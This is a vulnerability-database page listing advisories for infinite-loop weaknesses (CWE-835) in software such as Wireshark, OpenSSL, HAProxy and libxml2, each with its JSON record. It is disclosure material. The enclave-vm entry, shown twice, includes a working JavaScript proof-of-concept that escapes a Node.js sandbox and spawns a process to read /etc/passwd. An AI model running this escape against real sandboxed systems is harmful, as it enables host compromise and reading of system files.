Common Weakness Enumeration

CWE-835

Allowed

Loop with Unreachable Exit Condition ('Infinite Loop')

Abstraction: Base · Status: Incomplete

The product contains an iteration or loop with an exit condition that cannot be reached, i.e., an infinite loop.

1052 vulnerabilities reference this CWE, most recent first.

GHSA-WXR6-PC3H-29GG

Vulnerability from github – Published: 2022-05-13 01:47 – Updated: 2025-04-20 03:36
VLAI
Details

In Wireshark 2.2.0 to 2.2.5 and 2.0.0 to 2.0.11, the WSP dissector could go into an infinite loop, triggered by packet injection or a malformed capture file. This was addressed in epan/dissectors/packet-wsp.c by adding a length check.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-7748"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-835"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-04-12T23:59:00Z",
    "severity": "HIGH"
  },
  "details": "In Wireshark 2.2.0 to 2.2.5 and 2.0.0 to 2.0.11, the WSP dissector could go into an infinite loop, triggered by packet injection or a malformed capture file. This was addressed in epan/dissectors/packet-wsp.c by adding a length check.",
  "id": "GHSA-wxr6-pc3h-29gg",
  "modified": "2025-04-20T03:36:01Z",
  "published": "2022-05-13T01:47:08Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7748"
    },
    {
      "type": "WEB",
      "url": "https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=13581"
    },
    {
      "type": "WEB",
      "url": "https://code.wireshark.org/review/gitweb?p=wireshark.git%3Ba=commit%3Bh=f55cbcde2c8f74b652add4450b0592082eb6acff"
    },
    {
      "type": "WEB",
      "url": "https://code.wireshark.org/review/gitweb?p=wireshark.git;a=commit;h=f55cbcde2c8f74b652add4450b0592082eb6acff"
    },
    {
      "type": "WEB",
      "url": "https://www.wireshark.org/security/wnpa-sec-2017-21.html"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/97628"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-X2FM-93WW-GGVX

Vulnerability from github – Published: 2022-05-13 01:02 – Updated: 2023-06-09 23:06
VLAI
Summary
Nokogiri gem, via libxml, is affected by DoS vulnerabilities
Details

parser.c in libxml2 before 2.9.5 does not prevent infinite recursion in parameter entities.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "nokogiri"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.8.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2017-16932"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-835"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-06-09T23:06:12Z",
    "nvd_published_at": "2017-11-23T21:29:00Z",
    "severity": "HIGH"
  },
  "details": "parser.c in libxml2 before 2.9.5 does not prevent infinite recursion in parameter entities.",
  "id": "GHSA-x2fm-93ww-ggvx",
  "modified": "2023-06-09T23:06:12Z",
  "published": "2022-05-13T01:02:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16932"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sparklemotion/nokogiri/issues/1714"
    },
    {
      "type": "WEB",
      "url": "https://github.com/GNOME/libxml2/commit/899a5d9f0ed13b8e32449a08a361e0de127dd961"
    },
    {
      "type": "WEB",
      "url": "https://blog.clamav.net/2018/07/clamav-01001-has-been-released.html"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.gnome.org/show_bug.cgi?id=759579"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/nokogiri/CVE-2017-16932.yml"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2017/11/msg00041.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00004.html"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3739-1"
    },
    {
      "type": "WEB",
      "url": "http://xmlsoft.org/news.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Nokogiri gem, via libxml, is affected by DoS vulnerabilities"
}

GHSA-X2MW-9W7G-6QH6

Vulnerability from github – Published: 2025-02-03 12:31 – Updated: 2025-02-03 18:30
VLAI
Details

Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a non-privileged user process to make valid GPU memory processing operations, including via WebGL or WebGPU, to cause the whole system to become unresponsive.This issue affects Bifrost GPU Kernel Driver: r44p1, from r46p0 through r49p0, from r50p0 through r51p0; Valhall GPU Kernel Driver: r44p1, from r46p0 through r49p0, from r50p0 through r51p0; Arm 5th Gen GPU Architecture Kernel Driver: r44p1, from r46p0 through r49p0, from r50p0 through r51p0.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-6790"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-835"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-02-03T11:15:09Z",
    "severity": "MODERATE"
  },
  "details": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027) vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a non-privileged user process to make valid GPU memory processing operations, including via WebGL or WebGPU, to cause the whole system to become unresponsive.This issue affects Bifrost GPU Kernel Driver: r44p1, from r46p0 through r49p0, from r50p0 through r51p0; Valhall GPU Kernel Driver: r44p1, from r46p0 through r49p0, from r50p0 through r51p0; Arm 5th Gen GPU Architecture Kernel Driver: r44p1, from r46p0 through r49p0, from r50p0 through r51p0.",
  "id": "GHSA-x2mw-9w7g-6qh6",
  "modified": "2025-02-03T18:30:41Z",
  "published": "2025-02-03T12:31:00Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6790"
    },
    {
      "type": "WEB",
      "url": "https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-X39W-8VM5-5M3P

Vulnerability from github – Published: 2026-02-05 17:49 – Updated: 2026-02-07 00:31
VLAI
Summary
Sandbox escape via infinite recursion and error objects
Details

Note: The npm package has moved to @enclave-vm/core (formerly enclave-vm).
All fixed versions and guidance refer to @enclave-vm/core.

Summary

The existing layers of security in enclave-vm are insufficient: The AST sanitization can be bypassed with dynamic property accesses, the hardening of the error objects does not cover the peculiar behavior or the vm module and the function constructor access prevention can be side-stepped by leveraging host object references.

Details

There is a bug in Node.js (https://www.staicu.org/publications/usenixSec2023-SandDriller.pdf) that makes the vm module leak host references inside the vm module in case of infinite recursion. An attacker can exploit these to escape the sandbox.

PoC

The following on was tested on Node.js v24.12.0 and enclave-vm 2.7.0.

import { Enclave } from 'enclave-vm';

// Create enclave with a tool handler
const enclave = new Enclave({
  timeout: 5000,
  maxToolCalls: 10,
  maxIterations: 1000,
  toolHandler: async (toolName, args) => {
    // Your tool execution logic
    return { success: true, data: `Called ${toolName}` };
  },
});

// Execute AgentScript code
const result = await enclave.run(`
let res = null, rootProt = null;
let a = () =>{
try {
  a();
} catch (e) {
  rootProt = e[["__proto__"]][["__proto__"]][["__proto__"]];
  res=e.stack
}
}
a();
rootProt[["foo"]] = rootProt[["toString"]][["constructor"]]  
rootProt[["foo"]]("let options = {file: 'cat', args: [null,'/etc/passwd'], envPairs: [], stdio: [{ type: 'pipe', readable: true, writable: false },{ type: 'pipe', readable: false, writable: true },{ type: 'pipe', readable: false, writable: true } ]}; console.log(process.binding('spawn_sync').spawn(options).output[1].toString())")();
`);

Impact

Sandbox escape and potential other escalations on FrontMCP/AgentFront/other Frontegg products.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "enclave-vm"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.7.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@enclave-vm/core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25533"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-835"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-05T17:49:35Z",
    "nvd_published_at": "2026-02-06T22:16:11Z",
    "severity": "MODERATE"
  },
  "details": "**Note:** The npm package has moved to `@enclave-vm/core` (formerly `enclave-vm`).  \nAll fixed versions and guidance refer to `@enclave-vm/core`.\n\n### Summary\nThe existing layers of security in enclave-vm are insufficient: The AST sanitization can be bypassed with dynamic property accesses, the hardening of the error objects does not cover the peculiar behavior or the vm module and the function constructor access prevention can be side-stepped by leveraging host object references.\n\n### Details\nThere is a bug in Node.js (https://www.staicu.org/publications/usenixSec2023-SandDriller.pdf) that makes the vm module leak host references inside the vm module in case of infinite recursion. An attacker can exploit these to escape the sandbox.\n\n### PoC\nThe following on was tested on Node.js v24.12.0 and enclave-vm 2.7.0.\n\n```js\nimport { Enclave } from \u0027enclave-vm\u0027;\n\n// Create enclave with a tool handler\nconst enclave = new Enclave({\n  timeout: 5000,\n  maxToolCalls: 10,\n  maxIterations: 1000,\n  toolHandler: async (toolName, args) =\u003e {\n    // Your tool execution logic\n    return { success: true, data: `Called ${toolName}` };\n  },\n});\n\n// Execute AgentScript code\nconst result = await enclave.run(`\nlet res = null, rootProt = null;\nlet a = () =\u003e{\ntry {\n  a();\n} catch (e) {\n  rootProt = e[[\"__proto__\"]][[\"__proto__\"]][[\"__proto__\"]];\n  res=e.stack\n}\n}\na();\nrootProt[[\"foo\"]] = rootProt[[\"toString\"]][[\"constructor\"]]  \nrootProt[[\"foo\"]](\"let options = {file: \u0027cat\u0027, args: [null,\u0027/etc/passwd\u0027], envPairs: [], stdio: [{ type: \u0027pipe\u0027, readable: true, writable: false },{ type: \u0027pipe\u0027, readable: false, writable: true },{ type: \u0027pipe\u0027, readable: false, writable: true } ]}; console.log(process.binding(\u0027spawn_sync\u0027).spawn(options).output[1].toString())\")();\n`);\n\n```\n### Impact\nSandbox escape and potential other escalations on FrontMCP/AgentFront/other Frontegg products.",
  "id": "GHSA-x39w-8vm5-5m3p",
  "modified": "2026-02-07T00:31:46Z",
  "published": "2026-02-05T17:49:35Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/agentfront/enclave/security/advisories/GHSA-x39w-8vm5-5m3p"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25533"
    },
    {
      "type": "WEB",
      "url": "https://github.com/agentfront/enclave/commit/2fcf5da81e7e2578ede6f94cae4f379165426dca"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/agentfront/enclave"
    },
    {
      "type": "WEB",
      "url": "https://www.staicu.org/publications/usenixSec2023-SandDriller.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Sandbox escape via infinite recursion and error objects"
}

GHSA-X3MH-JVJW-3XWX

Vulnerability from github – Published: 2022-03-16 00:00 – Updated: 2024-06-24 21:24
VLAI
Summary
openssl-src's infinite loop in `BN_mod_sqrt()` reachable when parsing certificates
Details

The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc).

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "openssl-src"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "300.0.0"
            },
            {
              "fixed": "300.0.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "openssl-src"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "111.18.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-0778"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-835"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-05-03T20:40:34Z",
    "nvd_published_at": "2022-03-15T17:15:00Z",
    "severity": "HIGH"
  },
  "details": "The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc).",
  "id": "GHSA-x3mh-jvjw-3xwx",
  "modified": "2024-06-24T21:24:17Z",
  "published": "2022-03-16T00:00:45Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-0778"
    },
    {
      "type": "WEB",
      "url": "https://rustsec.org/advisories/RUSTSEC-2022-0014.html"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202210-02"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20220321-0002"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20220429-0005"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20240621-0006"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/kb/HT213255"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/kb/HT213256"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/kb/HT213257"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2022/dsa-5103"
    },
    {
      "type": "WEB",
      "url": "https://www.openssl.org/news/secadv/20220315.txt"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpujul2022.html"
    },
    {
      "type": "WEB",
      "url": "https://www.tenable.com/security/tns-2022-06"
    },
    {
      "type": "WEB",
      "url": "https://www.tenable.com/security/tns-2022-07"
    },
    {
      "type": "WEB",
      "url": "https://www.tenable.com/security/tns-2022-08"
    },
    {
      "type": "WEB",
      "url": "https://www.tenable.com/security/tns-2022-09"
    },
    {
      "type": "WEB",
      "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html"
    },
    {
      "type": "WEB",
      "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246"
    },
    {
      "type": "WEB",
      "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83"
    },
    {
      "type": "WEB",
      "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65"
    },
    {
      "type": "WEB",
      "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=a466912611aa6cbdf550cd10601390e587451246"
    },
    {
      "type": "WEB",
      "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=380085481c64de749a6dd25cdf0bcf4360b30f83"
    },
    {
      "type": "WEB",
      "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=3118eb64934499d93db3230748a452351d1d9a65"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2022/May/33"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2022/May/35"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2022/May/38"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "openssl-src\u0027s infinite loop in `BN_mod_sqrt()` reachable when parsing certificates"
}

GHSA-X3VM-4X2Q-GCXM

Vulnerability from github – Published: 2022-01-13 00:01 – Updated: 2022-01-20 00:02
VLAI
Details

Unisys ClearPath MCP TCP/IP Networking Services 59.1, 60.0, and 62.0 has an Infinite Loop.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-45445"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-835"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-01-12T18:15:00Z",
    "severity": "HIGH"
  },
  "details": "Unisys ClearPath MCP TCP/IP Networking Services 59.1, 60.0, and 62.0 has an Infinite Loop.",
  "id": "GHSA-x3vm-4x2q-gcxm",
  "modified": "2022-01-20T00:02:25Z",
  "published": "2022-01-13T00:01:12Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45445"
    },
    {
      "type": "WEB",
      "url": "https://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=68"
    },
    {
      "type": "WEB",
      "url": "https://unisys.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-X43J-M68C-2QXF

Vulnerability from github – Published: 2022-05-24 19:17 – Updated: 2025-11-04 21:30
VLAI
Details

TinyXML through 2.6.2 has an infinite loop in TiXmlParsingData::Stamp in tinyxmlparser.cpp via the TIXML_UTF_LEAD_0 case. It can be triggered by a crafted XML message and leads to a denial of service.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-42260"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-835"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-10-11T20:15:00Z",
    "severity": "HIGH"
  },
  "details": "TinyXML through 2.6.2 has an infinite loop in TiXmlParsingData::Stamp in tinyxmlparser.cpp via the TIXML_UTF_LEAD_0 case. It can be triggered by a crafted XML message and leads to a denial of service.",
  "id": "GHSA-x43j-m68c-2qxf",
  "modified": "2025-11-04T21:30:26Z",
  "published": "2022-05-24T19:17:08Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-42260"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00019.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00041.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4QCR5PIOBGDIDS6SYRESTMDJSEDFSCOE"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HOMBSHRIW5Q34SQSXYURYAOYDZD2NQF6"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4QCR5PIOBGDIDS6SYRESTMDJSEDFSCOE"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HOMBSHRIW5Q34SQSXYURYAOYDZD2NQF6"
    },
    {
      "type": "WEB",
      "url": "https://sourceforge.net/p/tinyxml/bugs/141"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-X4FC-X944-V9P7

Vulnerability from github – Published: 2022-03-03 00:00 – Updated: 2022-03-17 00:04
VLAI
Details

A flaw was found in the way HAProxy processed HTTP responses containing the "Set-Cookie2" header. This flaw could allow an attacker to send crafted HTTP response packets which lead to an infinite loop, eventually resulting in a denial of service condition. The highest threat from this vulnerability is availability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-0711"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-835"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-03-02T22:15:00Z",
    "severity": "HIGH"
  },
  "details": "A flaw was found in the way HAProxy processed HTTP responses containing the \"Set-Cookie2\" header. This flaw could allow an attacker to send crafted HTTP response packets which lead to an infinite loop, eventually resulting in a denial of service condition. The highest threat from this vulnerability is availability.",
  "id": "GHSA-x4fc-x944-v9p7",
  "modified": "2022-03-17T00:04:06Z",
  "published": "2022-03-03T00:00:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-0711"
    },
    {
      "type": "WEB",
      "url": "https://github.com/haproxy/haproxy/commit/bfb15ab34ead85f64cd6da0e9fb418c9cd14cee8"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/cve-2022-0711"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2022/dsa-5102"
    },
    {
      "type": "WEB",
      "url": "https://www.mail-archive.com/haproxy@formilux.org/msg41833.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-X5VR-48JX-H8WP

Vulnerability from github – Published: 2023-02-07 21:30 – Updated: 2023-02-16 15:30
VLAI
Details

A flaw was found in libXpm. This issue occurs when parsing a file with a comment not closed; the end-of-file condition will not be detected, leading to an infinite loop and resulting in a Denial of Service in the application linked to the library.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-46285"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-835"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-02-07T19:15:00Z",
    "severity": "HIGH"
  },
  "details": "A flaw was found in libXpm. This issue occurs when parsing a file with a comment not closed; the end-of-file condition will not be detected, leading to an infinite loop and resulting in a Denial of Service in the application linked to the library.",
  "id": "GHSA-x5vr-48jx-h8wp",
  "modified": "2023-02-16T15:30:30Z",
  "published": "2023-02-07T21:30:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-46285"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2160092"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.freedesktop.org/xorg/lib/libxpm/-/commit/a3a7c6dcc3b629d7650148"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.freedesktop.org/xorg/lib/libxpm/-/merge_requests/9"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00021.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.x.org/archives/xorg-announce/2023-January/003312.html"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2023/10/03/1"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2023/10/03/10"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-X76G-P4RM-4XCH

Vulnerability from github – Published: 2022-05-24 19:18 – Updated: 2022-05-24 19:18
VLAI
Details

An issue was discovered in stb stb_image.h 1.33 through 2.27. The HDR loader parsed truncated end-of-file RLE scanlines as an infinite sequence of zero-length runs. An attacker could potentially have caused denial of service in applications using stb_image by submitting crafted HDR files.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-42715"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-835"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-10-21T19:15:00Z",
    "severity": "MODERATE"
  },
  "details": "An issue was discovered in stb stb_image.h 1.33 through 2.27. The HDR loader parsed truncated end-of-file RLE scanlines as an infinite sequence of zero-length runs. An attacker could potentially have caused denial of service in applications using stb_image by submitting crafted HDR files.",
  "id": "GHSA-x76g-p4rm-4xch",
  "modified": "2022-05-24T19:18:26Z",
  "published": "2022-05-24T19:18:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-42715"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nothings/stb/issues/1224"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nothings/stb/pull/1223"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00045.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3TDGZFLBOP27LZKLH45WQLSNPSPP7S7Z"
    },
    {
      "type": "WEB",
